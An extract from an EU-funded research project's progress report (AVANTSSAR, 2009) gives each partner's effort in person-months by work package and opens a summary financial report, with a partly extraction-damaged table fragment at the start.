00.0

00.1

60.2

0

Com

positio

nal re

asonin

g for

serv

[Table 7, part 2/3, continued from the previous page: the remaining rows (Compositional reasoning for services … WP 3.4; Abstraction techniques… WP 3.5; The AVANTSSAR Validation Platform WP 4; The TS Orchestrator WP 4.1; The TS Validator WP 4.2; Platform integration WP 4.3; Proof of concept WP 5; Definition of the relevant problem cases WP 5.1; Formalisation of the problem cases WP 5.2; Validation of the problem cases WP 5.3; Assessment WP 5.4; Dissemination and industry migration WP 6; Dissemination WP 6.1; Migration to industrial development env WP 6.2; Migration to standardisation bodies WP 6.3; Total) for the partners UPS-IRIT, UGDIST, IBM and OpenTrust. Columns: WP/Task; Planned Date (Start, End); Actual Date (Start, End); then per partner Act P1, Act P2, Act P3, Est, Act Total. The rotated table did not survive extraction; the same figures are given per beneficiary in Tables 11 to 14 below.]

FP7-ICT-2007-1 Project No. 216471

D1.4: Progress/Assessment Report for Year 2 (Period P2: 01.01.09 — 31.12.09) 84/165

Table 7: Total resources for Period P2 (full table, part 3/3)

[Rows WP 1 through WP 6.3 plus the Total row for the partners IEAT, SAP and SIEMENS and for the AVANTSSAR project as a whole. Columns: WP/Task; Planned Date (Start, End); Actual Date (Start, End); then per partner Act P1, Act P2, Act P3, Est, Act Total. The rotated table did not survive extraction; the per-beneficiary figures are given in Tables 15 to 17 below.]


Table 8: Resources for Period P2: UNIVR

WP | Estimated Effort (Whole Project) | Planned Date: Start, End | Actual Date: Start, End | Actual Effort: Period P1, Period P2, Period P3 | Cumulative Effort (Since start) | Remaining Effort

(Effort in person-months; Remaining Effort is listed for the top-level work packages only.)

Project Management WP 1 13.00 1 36 1 2.76 4.54 0.00 7.30 5.70

Project Coordination WP 1.1 5.00 1 36 1 0.94 2.12 0.00 3.06

Project Meetings WP 1.2 4.00 1 36 1 1.18 0.62 0.00 1.80

Project Administration WP 1.3 4.00 1 36 1 0.64 1.80 0.00 2.44

Modeling trust and security aspects… WP 2 15.00 1 30 1 1.85 9.42 0.00 11.27 3.73

Initial version of ASLan… WP 2.1 5.00 1 9 1 9 1.70 0.00 0.00 1.70

Extended version of ASLan… WP 2.2 5.00 10 18 10 18 0.15 8.72 0.00 8.87

Final version of ASLan… WP 2.3 5.00 19 30 19 0.00 0.70 0.00 0.70

Automated reasoning techniques WP 3 20.00 1 36 1 6.46 10.01 0.00 16.47 3.53

Satisfiability of ASLan policies WP 3.1 8.00 1 30 1 0.60 2.23 0.00 2.83

Model checking of ASLan services… WP 3.2 3.00 6 32 6 0.79 1.32 0.00 2.11

Attacker models WP 3.3 3.00 1 10 1 10 3.71 3.12 0.00 6.83

Compositional reasoning for services … WP 3.4 3.00 6 34 6 1.22 2.56 0.00 3.78

Abstraction techniques… WP 3.5 3.00 9 34 9 0.14 0.78 0.00 0.92

The AVANTSSAR Validation Platform WP 4 12.00 1 36 1 0.19 6.17 0.00 6.36 5.64

The TS Orchestrator WP 4.1 5.00 6 30 6 0.19 0.62 0.00 0.81

The TS Validator WP 4.2 7.00 6 30 6 0.00 2.43 0.00 2.43

Platform integration WP 4.3 0.00 6 30 6 0.00 3.12 0.00 3.12

Proof of concept WP 5 5.00 1 36 1 7.64 8.32 0.00 15.96 -10.96

Definition of the relevant problem cases WP 5.1 1.00 1 6 1 6 6.41 0.55 0.00 6.96

Formalisation of the problem cases WP 5.2 2.00 3 30 3 1.23 4.76 0.00 5.99

Validation of the problem cases WP 5.3 1.00 9 36 9 0.00 1.55 0.00 1.55

Assessment WP 5.4 1.00 9 36 9 0.00 1.46 0.00 1.46

Dissemination and industry migration WP 6 8.00 1 36 1 1.75 3.28 0.00 5.03 2.97

Dissemination WP 6.1 6.00 1 36 1 1.75 2.96 0.00 4.71

Migration to industrial development env WP 6.2 1.00 1 36 1 0.00 0.32 0.00 0.32

Migration to standardisation bodies WP 6.3 1.00 25 36 0.00 0.00 0.00 0.00

Total 73.00 20.65 41.74 0.00 62.39 10.61

One person-month is 140 person-hours

Progress overview sheet (Periods P1 and P2), Beneficiary 1: UNIVR


Table 9: Resources for Period P2: ETH Zurich

WP | Estimated Effort (Whole Project) | Planned Date: Start, End | Actual Date: Start, End | Actual Effort: Period P1, Period P2, Period P3 | Cumulative Effort (Since start) | Remaining Effort

(Effort in person-months; Remaining Effort is listed for the top-level work packages only.)

Project Management WP 1 1.00 1 36 1 0.30 0.30 0.00 0.60 0.40

Project Coordination WP 1.1 0.00 1 36 1 0.00 0.00 0.00 0.00

Project Meetings WP 1.2 0.70 1 36 1 0.20 0.20 0.00 0.40

Project Administration WP 1.3 0.30 1 36 1 0.10 0.10 0.00 0.20

Modeling trust and security aspects… WP 2 20.00 1 30 1 10.00 10.00 0.00 20.00 0.00

Initial version of ASLan… WP 2.1 7.00 1 9 1 9 9.00 1.00 0.00 10.00

Extended version of ASLan… WP 2.2 7.00 10 18 10 18 1.00 9.00 0.00 10.00

Final version of ASLan… WP 2.3 6.00 19 30 19 0.00 0.00 0.00 0.00

Automated reasoning techniques WP 3 26.00 1 36 1 4.00 8.00 0.00 12.00 14.00

Satisfiability of ASLan policies WP 3.1 2.00 1 30 1 0.00 0.00 0.00 0.00

Model checking of ASLan services… WP 3.2 7.00 6 32 6 1.00 3.00 0.00 4.00

Attacker models WP 3.3 8.00 1 10 1 10 2.50 2.00 0.00 4.50

Compositional reasoning for services … WP 3.4 9.00 6 34 6 0.50 3.00 0.00 3.50

Abstraction techniques… WP 3.5 0.00 9 34 9 0.00 0.00 0.00 0.00

The AVANTSSAR Validation Platform WP 4 13.00 1 36 1 0.00 3.00 0.00 3.00 10.00

The TS Orchestrator WP 4.1 2.00 6 30 6 0.00 1.00 0.00 1.00

The TS Validator WP 4.2 10.00 6 30 6 0.00 2.00 0.00 2.00

Platform integration WP 4.3 1.00 6 30 6 0.00 0.00 0.00 0.00

Proof of concept WP 5 7.00 1 36 1 3.70 4.70 0.00 8.40 -1.40

Definition of the relevant problem cases WP 5.1 2.00 1 6 1 6 1.00 0.00 0.00 1.00

Formalisation of the problem cases WP 5.2 2.00 3 30 3 2.70 4.00 0.00 6.70

Validation of the problem cases WP 5.3 2.00 9 36 9 0.00 0.70 0.00 0.70

Assessment WP 5.4 1.00 9 36 9 0.00 0.00 0.00 0.00

Dissemination and industry migration WP 6 5.00 1 36 1 0.00 0.00 0.00 0.00 5.00

Dissemination WP 6.1 3.00 1 36 1 0.00 0.00 0.00 0.00

Migration to industrial development env WP 6.2 1.00 1 36 1 0.00 0.00 0.00 0.00

Migration to standardisation bodies WP 6.3 1.00 25 36 0.00 0.00 0.00 0.00

Total 72.00 18.00 26.00 0.00 44.00 28.00

One person-month is 150 person-hours

Progress overview sheet (Periods P1 and P2), Beneficiary 2: ETH Zurich


Table 10: Resources for Period P2: INRIA

WP | Estimated Effort (Whole Project) | Planned Date: Start, End | Actual Date: Start, End | Actual Effort: Period P1, Period P2, Period P3 | Cumulative Effort (Since start) | Remaining Effort

(Effort in person-months; Remaining Effort is listed for the top-level work packages only.)

Project Management WP 1 1.00 1 36 1 0.30 0.30 0.00 0.60 0.40

Project Coordination WP 1.1 0.00 1 36 1 0.00 0.00 0.00 0.00

Project Meetings WP 1.2 0.70 1 36 1 0.20 0.20 0.00 0.40

Project Administration WP 1.3 0.30 1 36 1 0.10 0.10 0.00 0.20

Modeling trust and security aspects… WP 2 5.00 1 30 1 2.00 2.00 0.00 4.00 1.00

Initial version of ASLan… WP 2.1 1.00 1 9 1 9 2.00 0.00 0.00 2.00

Extended version of ASLan… WP 2.2 2.00 10 18 10 18 0.00 2.00 0.00 2.00

Final version of ASLan… WP 2.3 2.00 19 30 19 0.00 0.00 0.00 0.00

Automated reasoning techniques WP 3 23.00 1 36 1 9.70 6.30 0.00 16.00 7.00

Satisfiability of ASLan policies WP 3.1 8.00 1 30 1 1.70 1.30 0.00 3.00

Model checking of ASLan services… WP 3.2 3.00 6 32 6 0.00 6.00 0.00 6.00

Attacker models WP 3.3 10.00 1 10 1 10 8.00 0.00 0.00 8.00

Compositional reasoning for services … WP 3.4 2.00 6 34 6 0.00 0.00 0.00 0.00

Abstraction techniques… WP 3.5 0.00 9 34 9 0.00 0.00 0.00 0.00

The AVANTSSAR Validation Platform WP 4 19.00 1 36 1 7.00 7.00 0.00 14.00 5.00

The TS Orchestrator WP 4.1 11.00 6 30 6 7.00 6.00 0.00 13.00

The TS Validator WP 4.2 8.00 6 30 6 0.00 0.00 0.00 0.00

Platform integration WP 4.3 0.00 6 30 6 0.00 1.00 0.00 1.00

Proof of concept WP 5 6.00 1 36 1 2.00 2.00 0.00 4.00 2.00

Definition of the relevant problem cases WP 5.1 0.00 1 6 1 6 0.00 0.00 0.00 0.00

Formalisation of the problem cases WP 5.2 3.00 3 30 3 1.00 1.00 0.00 2.00

Validation of the problem cases WP 5.3 3.00 9 36 9 1.00 1.00 0.00 2.00

Assessment WP 5.4 0.00 9 36 9 0.00 0.00 0.00 0.00

Dissemination and industry migration WP 6 5.00 1 36 1 0.00 2.27 0.00 2.27 2.73

Dissemination WP 6.1 4.00 1 36 1 0.00 2.27 0.00 2.27

Migration to industrial development env WP 6.2 1.00 1 36 1 0.00 0.00 0.00 0.00

Migration to standardisation bodies WP 6.3 0.00 25 36 0.00 0.00 0.00 0.00

Total 59.00 21.00 19.87 0.00 40.87 18.13

One person-month is 133.92 person-hours

Progress overview sheet (Periods P1 and P2), Beneficiary 3: INRIA


Table 11: Resources for Period P2: UPS-IRIT

WP | Estimated Effort (Whole Project) | Planned Date: Start, End | Actual Date: Start, End | Actual Effort: Period P1, Period P2, Period P3 | Cumulative Effort (Since start) | Remaining Effort

(Effort in person-months; Remaining Effort is listed for the top-level work packages only.)

Project Management WP 1 1.00 1 36 1 0.25 0.25 0.00 0.50 0.50

Project Coordination WP 1.1 0.00 1 36 1 0.00 0.00 0.00 0.00

Project Meetings WP 1.2 0.70 1 36 1 0.25 0.25 0.00 0.50

Project Administration WP 1.3 0.30 1 36 1 0.00 0.00 0.00 0.00

Modeling trust and security aspects… WP 2 8.00 1 30 1 4.78 4.40 0.00 9.18 -1.18

Initial version of ASLan… WP 2.1 4.00 1 9 1 9 4.78 0.00 0.00 4.78

Extended version of ASLan… WP 2.2 2.00 10 18 10 18 0.00 4.40 0.00 4.40

Final version of ASLan… WP 2.3 2.00 19 30 19 0.00 0.00 0.00 0.00

Automated reasoning techniques WP 3 24.00 1 36 1 10.78 16.13 0.00 26.91 -2.91

Satisfiability of ASLan policies WP 3.1 16.00 1 30 1 7.78 14.13 0.00 21.91

Model checking of ASLan services… WP 3.2 6.00 6 32 6 1.00 0.00 0.00 1.00

Attacker models WP 3.3 0.00 1 10 1 10 1.00 0.00 0.00 1.00

Compositional reasoning for services … WP 3.4 2.00 6 34 6 1.00 2.00 0.00 3.00

Abstraction techniques… WP 3.5 0.00 9 34 9 0.00 0.00 0.00 0.00

The AVANTSSAR Validation Platform WP 4 12.00 1 36 1 0.00 1.15 0.00 1.15 10.85

The TS Orchestrator WP 4.1 10.00 6 30 6 0.00 0.58 0.00 0.58

The TS Validator WP 4.2 0.00 6 30 6 0.00 0.57 0.00 0.57

Platform integration WP 4.3 2.00 6 30 6 0.00 0.00 0.00 0.00

Proof of concept WP 5 2.00 1 36 1 1.50 0.40 0.00 1.90 0.10

Definition of the relevant problem cases WP 5.1 0.00 1 6 1 6 0.50 0.00 0.00 0.50

Formalisation of the problem cases WP 5.2 1.00 3 30 3 1.00 0.40 0.00 1.40

Validation of the problem cases WP 5.3 1.00 9 36 9 0.00 0.00 0.00 0.00

Assessment WP 5.4 0.00 9 36 9 0.00 0.00 0.00 0.00

Dissemination and industry migration WP 6 5.00 1 36 1 0.00 0.37 0.00 0.37 4.63

Dissemination WP 6.1 4.00 1 36 1 0.00 0.37 0.00 0.37

Migration to industrial development env WP 6.2 1.00 1 36 1 0.00 0.00 0.00 0.00

Migration to standardisation bodies WP 6.3 0.00 25 36 0.00 0.00 0.00 0.00

Total 52.00 17.31 22.70 0.00 40.01 11.99

One person-month is 152 person-hours

Progress overview sheet (Periods P1 and P2), Beneficiary 4: UPS-IRIT


Table 12: Resources for Period P2: UGDIST

WP | Estimated Effort (Whole Project) | Planned Date: Start, End | Actual Date: Start, End | Actual Effort: Period P1, Period P2, Period P3 | Cumulative Effort (Since start) | Remaining Effort

(Effort in person-months; Remaining Effort is listed for the top-level work packages only.)

Project Management WP 1 1.00 1 36 1 0.50 0.50 0.00 1.00 0.00

Project Coordination WP 1.1 0.00 1 36 1 0.00 0.00 0.00 0.00

Project Meetings WP 1.2 0.30 1 36 1 0.00 0.00 0.00 0.00

Project Administration WP 1.3 0.70 1 36 1 0.50 0.00 0.00 0.50

Modeling trust and security aspects… WP 2 5.00 1 30 1 2.00 13.00 0.00 15.00 -10.00

Initial version of ASLan… WP 2.1 2.00 1 9 1 9 2.00 0.00 0.00 2.00

Extended version of ASLan… WP 2.2 2.00 10 18 10 18 0.00 13.00 0.00 13.00

Final version of ASLan… WP 2.3 1.00 19 30 19 0.00 0.00 0.00 0.00

Automated reasoning techniques WP 3 20.00 1 36 1 6.50 8.50 0.00 15.00 5.00

Satisfiability of ASLan policies WP 3.1 4.00 1 30 1 0.00 0.00 0.00 0.00

Model checking of ASLan services… WP 3.2 6.00 6 32 6 3.00 6.00 0.00 9.00

Attacker models WP 3.3 5.00 1 10 1 10 3.50 2.50 0.00 6.00

Compositional reasoning for services … WP 3.4 3.00 6 34 6 0.00 0.00 0.00 0.00

Abstraction techniques… WP 3.5 2.00 9 34 9 0.00 0.00 0.00 0.00

The AVANTSSAR Validation Platform WP 4 24.00 1 36 1 3.00 15.00 0.00 18.00 6.00

The TS Orchestrator WP 4.1 4.00 6 30 6 0.00 0.00 0.00 0.00

The TS Validator WP 4.2 10.00 6 30 6 3.00 3.00 0.00 6.00

Platform integration WP 4.3 10.00 6 30 6 0.00 12.00 0.00 12.00

Proof of concept WP 5 5.00 1 36 1 4.00 0.00 0.00 4.00 1.00

Definition of the relevant problem cases WP 5.1 0.00 1 6 1 6 0.00 0.00 0.00 0.00

Formalisation of the problem cases WP 5.2 2.00 3 30 3 3.00 0.00 0.00 3.00

Validation of the problem cases WP 5.3 2.00 9 36 9 1.00 0.00 0.00 1.00

Assessment WP 5.4 1.00 9 36 9 0.00 0.00 0.00 0.00

Dissemination and industry migration WP 6 5.00 1 36 1 0.50 1.00 0.00 1.50 3.50

Dissemination WP 6.1 2.00 1 36 1 0.50 1.00 0.00 1.50

Migration to industrial development env WP 6.2 2.00 1 36 1 0.00 0.00 0.00 0.00

Migration to standardisation bodies WP 6.3 1.00 25 36 0.00 0.00 0.00 0.00

Total 60.00 16.50 38.00 0.00 54.50 5.50

One person-month is 141.3 person-hours

Progress overview sheet (Periods P1 and P2), Beneficiary 5: UGDIST


Table 13: Resources for Period P2: IBM

WP | Estimated Effort (Whole Project) | Planned Date: Start, End | Actual Date: Start, End | Actual Effort: Period P1, Period P2, Period P3 | Cumulative Effort (Since start) | Remaining Effort

(Effort in person-months; Remaining Effort is listed for the top-level work packages only.)

Project Management WP 1 1.00 - - 1 0.30 0.65 0.00 0.95 0.05

Project Coordination WP 1.1 0.25 1 36 1 0.00 0.01 0.00 0.01

Project Meetings WP 1.2 0.50 1 36 1 0.30 0.25 0.00 0.55

Project Administration WP 1.3 0.25 1 36 1 0.00 0.39 0.00 0.39

Modeling trust and security aspects… WP 2 6.00 - - 1 3.95 2.12 0.00 6.07 -0.07

Initial version of ASLan… WP 2.1 2.00 1 9 1 9 3.95 0.72 0.00 4.67

Extended version of ASLan… WP 2.2 2.00 10 18 10 18 0.00 1.40 0.00 1.40

Final version of ASLan… WP 2.3 2.00 19 30 19 0.00 0.00 0.00 0.00

Automated reasoning techniques WP 3 14.00 - - 1 2.18 2.32 0.00 4.50 9.50

Satisfiability of ASLan policies WP 3.1 2.00 1 30 1 0.00 0.00 0.00 0.00

Model checking of ASLan services… WP 3.2 2.00 6 32 6 0.00 0.00 0.00 0.00

Attacker models WP 3.3 2.00 1 10 1 10 1.91 0.00 0.00 1.91

Compositional reasoning for services … WP 3.4 2.00 6 34 6 0.00 1.17 0.00 1.17

Abstraction techniques… WP 3.5 6.00 9 34 9 0.27 1.15 0.00 1.42

The AVANTSSAR Validation Platform WP 4 8.00 - - 1 0.00 3.36 0.00 3.36 4.64

The TS Orchestrator WP 4.1 0.00 6 30 6 0.00 0.00 0.00 0.00

The TS Validator WP 4.2 6.00 6 30 6 0.00 3.36 0.00 3.36

Platform integration WP 4.3 2.00 6 30 6 0.00 0.00 0.00 0.00

Proof of concept WP 5 6.00 1 36 1 3.55 1.20 0.00 4.75 1.25

Definition of the relevant problem cases WP 5.1 1.00 1 6 1 6 3.33 0.00 0.00 3.33

Formalisation of the problem cases WP 5.2 2.00 3 30 3 0.22 1.20 0.00 1.42

Validation of the problem cases WP 5.3 2.00 9 36 9 0.00 0.00 0.00 0.00

Assessment WP 5.4 1.00 9 36 9 0.00 0.00 0.00 0.00

Dissemination and industry migration WP 6 5.00 1 36 1 1.47 2.28 0.00 3.75 1.25

Dissemination WP 6.1 4.00 1 36 1 0.71 2.28 0.00 2.99

Migration to industrial development env WP 6.2 1.00 1 36 1 0.76 0.00 0.00 0.76

Migration to standardisation bodies WP 6.3 0.00 25 36 0.00 0.00 0.00 0.00

Total 40.00 11.46 11.93 0.00 23.39 16.61

One person-month is 146.66 person-hours

Progress overview sheet (Periods P1 and P2), Beneficiary 6: IBM


Table 14: Resources for Period P2: OpenTrust

WP | Estimated Effort (Whole Project) | Planned Date: Start, End | Actual Date: Start, End | Actual Effort: Period P1, Period P2, Period P3 | Cumulative Effort (Since start) | Remaining Effort

(Effort in person-months; Remaining Effort is listed for the top-level work packages only.)

Project Management WP 1 1.20 1 36 1 0.40 0.30 0.00 0.70 0.50

Project Coordination WP 1.1 0.00 1 36 1 0.00 0.00 0.00 0.00

Project Meetings WP 1.2 0.70 1 36 1 0.40 0.10 0.00 0.50

Project Administration WP 1.3 0.50 1 36 1 0.00 0.20 0.00 0.20

Modeling trust and security aspects… WP 2 3.00 1 30 1 0.40 0.60 0.00 1.00 2.00

Initial version of ASLan… WP 2.1 1.50 1 9 1 9 0.40 0.00 0.00 0.40

Extended version of ASLan… WP 2.2 0.75 10 18 10 18 0.00 0.60 0.00 0.60

Final version of ASLan… WP 2.3 0.75 19 30 19 0.00 0.00 0.00 0.00

Automated reasoning techniques WP 3 0.80 1 36 1 0.20 0.10 0.00 0.30 0.50

Satisfiability of ASLan policies WP 3.1 0.32 1 30 1 0.00 0.00 0.00 0.00

Model checking of ASLan services… WP 3.2 0.16 6 32 6 0.00 0.10 0.00 0.10

Attacker models WP 3.3 0.16 1 10 1 10 0.20 0.00 0.00 0.20

Compositional reasoning for services … WP 3.4 0.16 6 34 6 0.00 0.00 0.00 0.00

Abstraction techniques… WP 3.5 0.00 9 34 9 0.00 0.00 0.00 0.00

The AVANTSSAR Validation Platform WP 4 2.00 1 36 1 0.00 0.40 0.00 0.40 1.60

The TS Orchestrator WP 4.1 0.75 6 30 6 0.00 0.40 0.00 0.40

The TS Validator WP 4.2 1.00 6 30 6 0.00 0.00 0.00 0.00

Platform integration WP 4.3 0.25 6 30 6 0.00 0.00 0.00 0.00

Proof of concept WP 5 7.00 1 36 1 2.10 0.20 0.00 2.30 4.70

Definition of the relevant problem cases WP 5.1 1.00 1 6 1 6 2.10 0.00 0.00 2.10

Formalisation of the problem cases WP 5.2 3.00 3 30 3 0.00 0.20 0.00 0.20

Validation of the problem cases WP 5.3 2.00 9 36 9 0.00 0.00 0.00 0.00

Assessment WP 5.4 1.00 9 36 9 0.00 0.00 0.00 0.00

Dissemination and industry migration WP 6 17.00 1 36 1 4.40 0.40 0.00 4.80 12.20

Dissemination WP 6.1 0.00 1 36 1 0.00 0.00 0.00 0.00

Migration to industrial development env WP 6.2 17.00 1 36 1 4.40 0.40 0.00 4.80

Migration to standardisation bodies WP 6.3 0.00 25 36 0.00 0.00 0.00 0.00

Total 31.00 7.50 2.00 0.00 9.50 21.50

One person-month is 146.66 person-hours

Progress overview sheet (Periods P1 and P2), Beneficiary 7: OpenTrust


Table 15: Resources for Period P2: IEAT

WP | Estimated Effort (Whole Project) | Planned Date: Start, End | Actual Date: Start, End | Actual Effort: Period P1, Period P2, Period P3 | Cumulative Effort (Since start) | Remaining Effort

(Effort in person-months; Remaining Effort is listed for the top-level work packages only.)

Project Management WP 1 1.00 1 36 1 0.30 0.40 0.00 0.70 0.30

Project Coordination WP 1.1 0.00 1 36 1 0.00 0.00 0.00 0.00

Project Meetings WP 1.2 0.70 1 36 1 0.20 0.20 0.00 0.40

Project Administration WP 1.3 0.30 1 36 1 0.10 0.20 0.00 0.30

Modeling trust and security aspects… WP 2 9.00 1 30 1 1.50 2.00 0.00 3.50 5.50

Initial version of ASLan… WP 2.1 3.00 1 9 1 9 1.50 0.00 0.00 1.50

Extended version of ASLan… WP 2.2 3.00 10 18 10 18 0.00 2.00 0.00 2.00

Final version of ASLan… WP 2.3 3.00 19 30 19 0.00 0.00 0.00 0.00

Automated reasoning techniques WP 3 15.00 1 36 1 4.10 6.50 0.00 10.60 4.40

Satisfiability of ASLan policies WP 3.1 4.00 1 30 1 0.00 0.00 0.00 0.00

Model checking of ASLan services… WP 3.2 3.00 6 32 6 1.00 0.00 0.00 1.00

Attacker models WP 3.3 3.00 1 10 1 10 3.10 6.50 0.00 9.60

Compositional reasoning for services … WP 3.4 5.00 6 34 6 0.00 0.00 0.00 0.00

Abstraction techniques… WP 3.5 0.00 9 34 9 0.00 0.00 0.00 0.00

The AVANTSSAR Validation Platform WP 4 6.00 1 36 1 0.00 2.00 0.00 2.00 4.00

The TS Orchestrator WP 4.1 2.00 6 30 6 0.00 0.00 0.00 0.00

The TS Validator WP 4.2 4.00 6 30 6 0.00 2.00 0.00 2.00

Platform integration WP 4.3 0.00 6 30 6 0.00 0.00 0.00 0.00

Proof of concept WP 5 8.00 1 36 1 1.50 1.10 0.00 2.60 5.40

Definition of the relevant problem cases WP 5.1 1.00 1 6 1 6 1.00 0.00 0.00 1.00

Formalisation of the problem cases WP 5.2 3.00 3 30 3 0.50 0.30 0.00 0.80

Validation of the problem cases WP 5.3 3.00 9 36 9 0.00 0.60 0.00 0.60

Assessment WP 5.4 1.00 9 36 9 0.00 0.20 0.00 0.20

Dissemination and industry migration WP 6 4.00 1 36 1 0.60 1.00 0.00 1.60 2.40

Dissemination WP 6.1 3.00 1 36 1 0.00 1.00 0.00 1.00

Migration to industrial development env WP 6.2 1.00 1 36 1 0.60 0.00 0.00 0.60

Migration to standardisation bodies WP 6.3 0.00 25 36 0.00 0.00 0.00 0.00

Total 43.00 8.00 13.00 0.00 21.00 22.00

One person-month is 155 person-hours

Progress overview sheet (Periods P1 and P2), Beneficiary 8: IEAT


Table 16: Resources for Period P2: SAP

WP | Estimated Effort (Whole Project) | Planned Date: Start, End | Actual Date: Start, End | Actual Effort: Period P1, Period P2, Period P3 | Cumulative Effort (Since start) | Remaining Effort

(Effort in person-months; Remaining Effort is listed for the top-level work packages only.)

Project Management WP 1 1.00 1 36 1 0.07 0.09 0.00 0.16 0.84

Project Coordination WP 1.1 0.00 1 36 1 0.00 0.00 0.00 0.00

Project Meetings WP 1.2 0.50 1 36 1 0.07 0.09 0.00 0.16

Project Administration WP 1.3 0.50 1 36 1 0.00 0.00 0.00 0.00

Modeling trust and security aspects… WP 2 16.00 1 30 1 6.14 2.21 0.00 8.35 7.65

Initial version of ASLan… WP 2.1 6.00 1 9 1 9 6.14 0.00 0.00 6.14

Extended version of ASLan… WP 2.2 5.00 10 18 10 18 0.00 2.21 0.00 2.21

Final version of ASLan… WP 2.3 5.00 19 30 19 0.00 0.00 0.00 0.00

Automated reasoning techniques WP 3 8.00 1 36 1 4.02 0.39 0.00 4.41 3.59

Satisfiability of ASLan policies WP 3.1 0.00 1 30 1 0.00 0.00 0.00 0.00

Model checking of ASLan services… WP 3.2 3.00 6 32 6 0.00 0.30 0.00 0.30

Attacker models WP 3.3 4.00 1 10 1 10 4.02 0.09 0.00 4.11

Compositional reasoning for services … WP 3.4 0.50 6 34 6 0.00 0.00 0.00 0.00

Abstraction techniques… WP 3.5 0.50 9 34 9 0.00 0.00 0.00 0.00

The AVANTSSAR Validation Platform WP 4 12.00 1 36 1 0.50 3.96 0.00 4.46 7.54

The TS Orchestrator WP 4.1 0.00 6 30 6 0.00 0.00 0.00 0.00

The TS Validator WP 4.2 6.00 6 30 6 0.50 2.00 0.00 2.50

Platform integration WP 4.3 6.00 6 30 6 0.00 1.96 0.00 1.96

Proof of concept WP 5 30.00 1 36 1 11.50 9.18 0.00 20.68 9.32

Definition of the relevant problem cases WP 5.1 6.00 1 6 1 6 6.00 0.00 0.00 6.00

Formalisation of the problem cases WP 5.2 13.00 3 30 3 5.50 4.18 0.00 9.68

Validation of the problem cases WP 5.3 4.00 9 36 9 0.00 2.00 0.00 2.00

Assessment WP 5.4 7.00 9 36 9 0.00 3.00 0.00 3.00

Dissemination and industry migration WP 6 36.00 1 36 1 9.29 10.93 0.00 20.22 15.78

Dissemination WP 6.1 4.00 1 36 1 1.29 1.00 0.00 2.29

Migration to industrial development env WP 6.2 32.00 1 36 1 8.00 7.93 0.00 15.93

Migration to standardisation bodies WP 6.3 0.00 25 36 0.00 2.00 0.00 2.00

Total 103.00 31.52 26.76 0.00 58.28 44.72

One person-month is 134.4 person-hours

Progress overview sheet (Periods P1 and P2), Beneficiary 9: SAP


Table 17: Resources for Period P2: SIEMENS

WP | Estimated Effort (Whole Project) | Planned Date: Start, End | Actual Date: Start, End | Actual Effort: Period P1, Period P2, Period P3 | Cumulative Effort (Since start) | Remaining Effort

(Effort in person-months; Remaining Effort is listed for the top-level work packages only.)

Project Management WP 1 1.00 1 36 1 0.30 0.30 0.00 0.60 0.40

Project Coordination WP 1.1 0.00 1 36 1 0.00 0.00 0.00 0.00

Project Meetings WP 1.2 0.70 1 36 1 0.20 0.20 0.00 0.40

Project Administration WP 1.3 0.30 1 36 1 0.10 0.10 0.00 0.20

Modeling trust and security aspects… WP 2 12.00 1 30 1 6.10 6.50 0.00 12.60 -0.60

Initial version of ASLan… WP 2.1 6.00 1 9 1 9 4.10 4.50 0.00 8.60

Extended version of ASLan… WP 2.2 4.00 10 18 10 18 2.00 2.00 0.00 4.00

Final version of ASLan… WP 2.3 2.00 19 30 19 0.00 0.00 0.00 0.00

Automated reasoning techniques WP 3 3.00 1 36 1 0.00 1.70 0.00 1.70 1.30

Satisfiability of ASLan policies WP 3.1 1.50 1 30 1 0.00 0.00 0.00 0.00

Model checking of ASLan services… WP 3.2 0.50 6 32 6 0.00 1.00 0.00 1.00

Attacker models WP 3.3 0.50 1 10 1 10 0.00 0.70 0.00 0.70

Compositional reasoning for services … WP 3.4 0.00 6 34 6 0.00 0.00 0.00 0.00

Abstraction techniques… WP 3.5 0.50 9 34 9 0.00 0.00 0.00 0.00

The AVANTSSAR Validation Platform WP 4 1.00 1 36 1 0.30 0.00 0.00 0.30 0.70

The TS Orchestrator WP 4.1 0.00 6 30 6 0.00 0.00 0.00 0.00

The TS Validator WP 4.2 0.50 6 30 6 0.00 0.00 0.00 0.00

Platform integration WP 4.3 0.50 6 30 6 0.30 0.00 0.00 0.30

Proof of concept WP 5 28.00 1 36 1 8.40 14.80 0.00 23.20 4.80

Definition of the relevant problem cases WP 5.1 7.50 1 6 1 6 7.50 0.00 0.00 7.50

Formalisation of the problem cases WP 5.2 15.50 3 30 3 0.90 9.80 0.00 10.70

Validation of the problem cases WP 5.3 3.00 9 36 9 0.00 4.00 0.00 4.00

Assessment WP 5.4 2.00 9 36 9 0.00 1.00 0.00 1.00

Dissemination and industry migration WP 6 12.00 1 36 1 0.80 0.90 0.00 1.70 10.30

Dissemination WP 6.1 7.00 1 36 1 0.50 0.60 0.00 1.10

Migration to industrial development env WP 6.2 0.00 1 36 1 0.00 0.30 0.00 0.30

Migration to standardisation bodies WP 6.3 5.00 25 36 4 0.30 0.00 0.00 0.30

Total 57.00 15.90 24.20 0.00 40.10 16.90

One person-month is 136 person-hours

Progress overview sheet (Periods P1 and P2), Beneficiary 10: SIEMENS


6.2 Explanation of personnel costs, subcontracting and any major direct costs

Tables 18 to 43 provide explanations of personnel costs, subcontracting (none) and any major direct costs for each beneficiary; the first set of these tables is taken from the FORMs C, while the second set provides more details on the direct costs.

Note that no personnel cost was charged by Nancy 2 University for the AVANTSSAR project progress in 2009. A personnel cost of € 24,638 was charged by the CNRS to UPS-IRIT for the AVANTSSAR project, corresponding to Philippe Balbiani's participation.

Note also that the SIEMENS travel costs are already included in the indirect costs, and according to the 50/50 funding scheme for industrial partners, only half of the amounts quoted below are (indirectly) funded by the EU.


Table 18: Total costs for Period P2

FP7 - Grant Agreement - Annex VI - Collaborative project

1 2010-04-18 22:02

DRAFT

Summary Financial report - Collaborative project

Project acronym AVANTSSAR Project nr 216471 Reporting period from 01/01/2009 to 31/12/2009 Page 1/1 Funding scheme CP

Columns: Benef. nr; If 3rd Party, linked to benef.; Adjustment (Yes/No); Organisation Short Name; then, for each Type of activity, Total and Max EC Contrib.: RTD (A), Demonstration (B), Management (C), Other (D), Total (A+B+C+D); then Req. EC Contrib., Receipts, Interest. Amounts in €.

Benef. 1, Adjustment No, UNIVR: RTD 155,766 / 116,824; Demonstration 0 / 0; Management 32,728 / 32,728; Other 0 / 0; Total 188,494 / 149,552; Req. EC Contrib. 149,552; Receipts 0; Interest 0

Benef. 1, Adjustment Yes (2), UNIVR: RTD 40 / 30; Demonstration 0 / 0; Management 3,649 / 3,649; Other 0 / 0; Total 3,689 / 3,679; Req. EC Contrib. 3,679; Receipts 0; Interest 0

